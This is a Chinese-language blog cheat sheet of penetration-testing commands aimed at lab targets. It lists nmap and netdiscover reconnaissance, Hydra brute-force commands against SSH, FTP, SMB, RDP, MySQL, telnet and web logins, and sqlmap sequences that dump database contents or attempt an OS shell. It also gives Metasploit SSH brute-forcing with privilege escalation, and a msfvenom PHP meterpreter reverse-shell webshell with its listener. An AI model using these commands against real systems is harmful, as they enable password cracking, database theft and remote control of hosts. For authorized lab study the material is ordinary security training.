渗透小工具总结


网站目录扫描:

御剑工具进行扫描:

7kbscan工具进行网站目录扫描:

探测靶场IP

使用netdiscover -r ip/netmask
先输入ifconfig查询当前ip和子网掩码

当我输入netdiscover -r 192.168.1.117/24
速度可能有点慢,需要等待一会儿

挖掘开放服务信息
nmap -sV ip

挖掘靶场全部信息
nmap -A -v 靶场IP地址


挖掘靶场的操作系统类型与版本
nmap -O 靶场IP地址

挖掘靶场全部信息 A全部 v格式化输出 T线程
nmap -A -v -T4 ip
探测所有开放的端口
nmap -p- -T4 ip
探测端口隐藏文件
dirb http://ip:port/

用nikto扫描器挖掘敏感信息
nikto -host 靶场IP地址:端口

Hydra密码爆破工具

windows上编译好的下载地址:地址
kali系统自带这个工具;

1>爆破SSH
hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh
2>爆破FTP
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3>爆破SMB
hydra -l administrator -P pass.txt 192.168.0.2 smb
4>爆破rdp
hydra ip rdp -l administrator -P pass.txt -V
5>爆破POP3
hydra -l muts -P pass.txt my.pop3.mail pop3
6>爆破http-proxy
hydra -l admin -P pass.txt http-proxy://192.168.0.2
7>爆破web表单
hydra -l 用户名 -P 密码字典 -s 80 域名 http-post-form"/admin/login.php:username=^USER^&password=^PASS^:<密码错误的时候的报错>"
8>mysql破解
hydra -l root –P pass.txt –e ns 127.0.0.1 mysql
相关命令:
get类的sql注入命令:
sqlmap -u url -dbs 查看数据库名 //url:cat.php?id=1
sqlmap -u url -D "" --tables 查看对应数据库中的数据表
sqlmap -u url -D "" -T "" --columns 查看对应字段
sqlmap -u url -D "" -T "" -C "" --dump 查看字段的值 //y y 
// sqlmap -u url --os-shell 可以尝试直接获取shell
post类的失去了注入命令:
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch 
sqlmap -r request.raw --level 5 --risk 3  -D "数据库名" -tables 查看对应数据库中的数据表 --batch
sqlmap -r request.raw --level 5 --risk 3  -D "数据库名" -T “表名”-columns 查看对应字段 --batch
sqlmap -r request.raw --level 5 --risk 3  -D "数据库名" -T “表名”-C "列名" --dump --batch
X-Forwarded-For注入漏洞:
sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u url --headers="X-Forwarded-For:*" -D “数据库名” --tables 查看对应数据库中的数据表 --batch
sqlmap -u url --headers="X-Forwarded-For:*" -D “数据库名” -T “表名”--columns 查看对应字段 --batch
sqlmap -u url --headers="X-Forwarded-For:*" -D “数据库名” -T “表名”-C “列名”--dump --batch
9、telnet 破解
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
sql注入攻击工具使用

sqlmap工具使用教程

利用cupp创建字典
git clone https://github.com/jeanphorn/common-password
chmod +x cupp.py
./cupp.py -i 以交互的方式创建字典

字典生成脚本, 用python语言写成的可交互性的字典生成脚本。尤其适合社会工程学,当你收集到目标的具体信息后,你就可以通过这个脚本来智能化生成关于目标的字典。

使用metasploit破解SSH
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 攻击IP
set username hadi
set pass_file hadi.txt
set threads 6
set verbose true
show options
run

之后可以:

sessions -i 1    开启shell
python -c "import pty;pty.spawn('/bin/bash')"   拿到一个交互性好的shell
su - root   提权
开放smb服务的情况(139,445)

列出文件,查出敏感文件

smbclient -L ip

访问文件

smbclient '\\ip\文件夹名''
通过get 文件来下载文件
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=攻击机监听端口 -f raw


攻击机监听:

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 攻击机ip
set lport 攻击机监听端口
run
查找漏洞

searchsploit 版本号

对大端口非http服务 使用nc来探测端口的banner信息
nc ip port

web漏洞扫描器owasp-zap

专注于web安全的漏洞扫描器avws

wpscan的web扫描工具

扫描某登陆界面的用户名


文章作者: P1n9
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 P1n9 !
评论
 上一篇
kali安装AWVS kali安装AWVS
一、简介Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它可以通过网络爬虫测试你的网站安全,AWVS能够针对SQL注入、XSS、XEE、SSRF、主机头等其他web漏洞执行精
2020-03-19
下一篇 
Rootkit学习 Rootkit学习
Rootkit解释rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的,文件级别的主要是通过程序或者系统漏洞进入系统,通过修改重要的文件达到隐
  目录